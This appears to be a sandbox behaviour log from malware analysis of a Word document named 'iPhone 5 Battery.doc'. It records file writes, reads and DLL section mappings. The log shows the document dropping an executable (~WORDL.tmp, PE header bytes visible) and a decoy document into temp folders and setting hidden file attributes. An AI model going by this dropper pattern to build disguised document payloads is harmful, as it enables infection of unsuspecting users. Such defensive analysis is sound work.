C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 C0D0229 CreateFileA
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc read attributes and synchronize and generic write normal synchronous io non alert and non directory file success or wait 1 C0D029F CreateFileA
File Written
File Path Offset Length Value Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot unknown 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot unknown 108 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc unknown 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc unknown 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 40 00 08 00 36 01 05 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1A 00 00 00 success or wait 1 30041F40 WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0002.doc unknown 581 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 1 3019476C WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp unknown 90112 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1 C0D0488 WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc unknown 21504 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 25 00 00 00 00 00 00 00 00 10 00 00 27 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 24 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 1 C0D0334 WriteFile
File Read
File Path Offset Length Value Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc unknown 90112 C9 DF 16 87 9B 99 9A 9B 98 9D 9E 9F 6F 6E 92 93 2C 95 96 97 E8 E9 EA EB AC ED EE EF E0 E1 E2 E3 E4 E5 E6 E7 F8 F9 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 CA CB CC CD CE CF 38 C1 C2 C3 CA DA 7C C9 D8 6D D3 16 FD 65 DF 93 1D F0 86 BB BD A6 F6 A7 5A 46 4D 59 4D 40 0E 4C 41 4F 4C 4C 50 05 44 42 success or wait 1 C0D044D ReadFile
C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc unknown 21504 32 2C F5 05 47 56 E2 18 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 F4 CB CF CD 30 30 C9 C1 C4 C3 C4 C5 C6 C7 D8 D9 DA DB DC DD DF DF D0 D1 F7 D3 D4 D5 D6 D7 28 29 2A 3B 2C 2D 09 2F 20 21 23 23 24 25 D8 D8 C7 C6 3A 3B 3C 3D 1A 3F 30 31 CD CC CB CA C9 C8 F7 F6 F5 F4 F3 F2 F1 F0 FF FE FD FC FB FA success or wait 1 C0D02FB ReadFile
Other File Operations
File Path Disposition Data Ascii Data Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word BasicInformation Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: hidden and archive and temporary and sparse file success or wait 1 3017FDD4 SetFileAttributesW

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8C0000 778240 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8C0000 778240 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read reserve A10000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A50000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A50000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit A90000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit A90000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AA0000 1757184 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AA0000 1757184 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read reserve C50000 126976 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit CF0000 401408 own pid execute success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit CF0000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit CF0000 618496 own pid readonly success or wait 1
\BaseNamedObjects\DfSharedHeap35EFC query and write and read reserve DA0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-220928 query and write and read commit D10000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000035EFC query and write and read commit 11A0000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-220944 query and write and read commit 11B0000 524288 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit 1240000 1105920 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 1097728 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1300000 4096 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1330000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1330000 2904064 own pid read write conflicting addresses 1
C:\WINDOWS\system32\sti.dll write and read and execute commit 1900000 69632 own pid execute success or wait 1
C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1
\KnownDlls\CFGMGR32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
\KnownDlls\setupapi.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG..LMIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.MNH query and write and read and execute and extend size unknown 1910000 524288 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.B.LNIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.C.LNIJC query and write and read commit 1990000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.D.LNIJC query and write and read commit 19A0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.E.LNIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read reserve 19B0000 126976 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.F.KOIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.IOG.G.KOIJC query and write and read commit 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.CB.KPIJC query and write and read and execute and extend size unknown 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.DB.KPIJC query and write and read and execute and extend size unknown 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.EB.KPIJC query and write and read and execute and extend size unknown 1900000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown 1990000 126976 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read reserve 1990000 126976 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap37B58 query and write and read reserve 19D0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-228188 query and write and read commit 1DD0000 598016 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000037B58 query and write and read commit 1E70000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-228204 query and write and read commit 1E80000 524288 own pid read write success or wait 1
\KnownDlls\winspool.drv write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll write and read and execute commit 2020000 745472 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll query and write and read and execute image 7E5A0000 761856 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 2040000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 2040000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2020000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2030000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2030000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 2040000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 2040000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll write and read and execute commit 2020000 765952 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll query and write and read and execute image 3F500000 786432 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2030000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2040000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2040000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2030000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2040000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2040000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 2430000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2430000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2440000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2440000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 1F20000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 1F20000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 1F20000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 1F20000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
